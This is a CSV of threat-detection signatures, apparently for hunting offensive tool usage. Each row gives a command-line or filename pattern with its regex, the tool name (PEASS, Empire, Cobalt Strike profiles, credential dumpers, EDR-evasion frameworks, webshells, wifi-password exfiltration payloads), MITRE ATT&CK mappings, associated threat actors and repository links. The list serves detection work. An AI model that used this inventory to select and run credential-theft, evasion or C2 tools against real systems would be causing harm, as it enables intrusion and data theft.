"* import LinpeasBaseBuilder*",".{0,1000}\simport\sLinpeasBaseBuilder.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","1642"
"* import LinpeasBuilder*",".{0,1000}\simport\sLinpeasBuilder.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","1643"
"* import PEASLoaded*",".{0,1000}\simport\sPEASLoaded.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","1644"
"* import PEASRecord*",".{0,1000}\simport\sPEASRecord.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","1645"
"* import Spoofer, Sniffer, Roaster*",".{0,1000}\simport\sSpoofer,\sSniffer,\sRoaster.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","1646"
"* Import tokens from other tools for use in GraphRunner*",".{0,1000}\sImport\stokens\sfrom\sother\stools\sfor\suse\sin\sGraphRunner.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","1647"
"* -ImportDllPathPtr *",".{0,1000}\s\-ImportDllPathPtr\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","1648"
"* impress-remote-discover.nse*",".{0,1000}\simpress\-remote\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1649"
"* -inc -u=0 *.pwd*",".{0,1000}\s\-inc\s\-u\=0\s.{0,1000}\.pwd.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1650"
"* -inc=digits *",".{0,1000}\s\-inc\=digits\s.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1651"
"* inceptor.*dotnet*",".{0,1000}\sinceptor\..{0,1000}dotnet.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","1652"
"* inceptor.py*",".{0,1000}\sinceptor\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","1653"
"* inceptor.py*",".{0,1000}\sinceptor\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","1654"
"* inceptor.spec*",".{0,1000}\sinceptor\.spec.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","1655"
"* --includeModules amass*",".{0,1000}\s\-\-includeModules\samass.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","1656"
"* -InFile Wi-Fi-PASS*",".{0,1000}\s\-InFile\sWi\-Fi\-PASS.{0,1000}","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","1657"
"* InflativeLoading.py*",".{0,1000}\sInflativeLoading\.py.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","1658"
"* informix-brute.nse*",".{0,1000}\sinformix\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1659"
"* informix-query.nse*",".{0,1000}\sinformix\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1660"
"* informix-tables.nse*",".{0,1000}\sinformix\-tables\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1661"
"* --Inject --stub *.dll* --app *",".{0,1000}\s\-\-Inject\s\-\-stub\s.{0,1000}\.dll.{0,1000}\s\-\-app\s.{0,1000}","offensive_tool_keyword","clickjack","automate abuse of clickonce applications","T1210 - T1204 - T1071.001","TA0001 - TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","1662"
"* -Injector NtMapViewOfSection*",".{0,1000}\s\-Injector\sNtMapViewOfSection.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","1663"
"* -Injector VirtualAllocEx*",".{0,1000}\s\-Injector\sVirtualAllocEx.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","1664"
"* --input 10m_usernames.txt*",".{0,1000}\s\-\-input\s10m_usernames\.txt.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","1665"
"* -InputObject $backdoorcode -Append *",".{0,1000}\s\-InputObject\s\$backdoorcode\s\-Append\s.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","1666"
"* -InputPath .\TrustedForests.txt*",".{0,1000}\s\-InputPath\s\.\\TrustedForests\.txt.{0,1000}","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","0","N/A","N/A","8","10","1086","100","2025-04-21T12:43:50Z","2022-04-28T01:37:32Z","1667"
"* --insecure brute --userpass *",".{0,1000}\s\-\-insecure\sbrute\s\-\-userpass\s.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","1668"
"* --insecure brute --users *",".{0,1000}\s\-\-insecure\sbrute\s\-\-users\s.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","1669"
"* instabf.py*",".{0,1000}\sinstabf\.py.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","0","N/A","N/A","7","1","59","13","2024-04-23T02:47:28Z","2020-11-20T22:22:48Z","1670"
"* instainsane.sh*",".{0,1000}\sinstainsane\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","0","N/A","N/A","7","7","655","371","2024-02-11T10:29:05Z","2018-12-02T22:48:11Z","1671"
"* install *masscan*",".{0,1000}\sinstall\s.{0,1000}masscan.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","Black Basta - Unit 29155 - Akira - EMBER BEAR","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","#linux","N/A","N/A","10","24345","3118","2024-12-13T12:22:18Z","2013-07-28T05:35:33Z","1672"
"* install amass",".{0,1000}install\samass","offensive_tool_keyword","Amass","In-depth subdomain enumeration tool that performs scraping. recursive brute forcing06/01/2021 crawling of web archives06/01/2021 name altering and reverse DNS sweeping","T1593 - T1594 - T1595 - T1567 - T1569","TA0007 - TA0009 - TA0004 - TA0005 - TA0011","N/A","EMBER BEAR","Reconnaissance","https://github.com/OWASP/Amass","1","0","#linux","N/A","5","10","12855","1965","2025-04-21T23:28:45Z","2018-07-10T16:05:08Z","1673"
"* install armitage*",".{0,1000}\sinstall\sarmitage.{0,1000}","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/r00t0v3rr1d3/armitage","1","0","N/A","N/A","N/A","2","129","32","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z","1674"
"* install arsenal-cli*",".{0,1000}\sinstall\sarsenal\-cli.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","1675"
"* install autobloody*",".{0,1000}\sinstall\sautobloody.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","#linux","N/A","10","6","545","54","2024-11-14T13:07:54Z","2022-09-07T13:34:30Z","1676"
"* install backdoor-factory*",".{0,1000}\sinstall\sbackdoor\-factory.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE  ELF  Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","1677"
"* install chisel*",".{0,1000}\sinstall\schisel.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","1681"
"* install chntpw*",".{0,1000}\sinstall\schntpw.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","1682"
"* install cliws*",".{0,1000}\sinstall\scliws.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#linux","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","1683"
"* install creddump7*",".{0,1000}\sinstall\screddump7.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","1684"
"* install dnscrypt-proxy*",".{0,1000}\sinstall\sdnscrypt\-proxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","1685"
"* install evil-proxy*",".{0,1000}\sinstall\sevil\-proxy.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","1686"
"* install evil-winrm*",".{0,1000}\sinstall\sevil\-winrm.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1687"
"* install github *merlin*",".{0,1000}\sinstall\sgithub\s.{0,1000}merlin.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/merlin","1","0","N/A","N/A","10","10","94","16","2025-04-16T13:05:47Z","2021-01-25T12:36:46Z","1688"
"* install gsocket*",".{0,1000}\sinstall\sgsocket.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","1689"
"* install hekatomb*",".{0,1000}\sinstall\shekatomb.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/Processus-Thief/HEKATOMB","1","0","N/A","N/A","10","6","N/A","N/A","N/A","N/A","1690"
"* install holehe*",".{0,1000}\sinstall\sholehe.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","#linux","N/A","6","10","8656","981","2024-09-10T20:24:32Z","2020-06-25T23:03:02Z","1691"
"* install iodine*",".{0,1000}\sinstall\siodine.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","1692"
"* install krbjack*",".{0,1000}\sinstall\skrbjack.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","N/A","10","2","113","21","2025-01-22T18:12:00Z","2023-04-16T10:44:55Z","1693"
"* install metasploit-framework*",".{0,1000}\sinstall\smetasploit\-framework.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","1696"
"* install nikto*",".{0,1000}\sinstall\snikto.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/sullo/nikto","1","0","#linux","N/A","N/A","10","9184","1306","2025-02-22T14:30:28Z","2012-11-24T04:24:29Z","1697"
"* install samdump2*",".{0,1000}\sinstall\ssamdump2.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","1700"
"* install spraycharles*",".{0,1000}\sinstall\sspraycharles.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","N/A","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","1703"
"* install tor2web*",".{0,1000}\sinstall\stor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","1707"
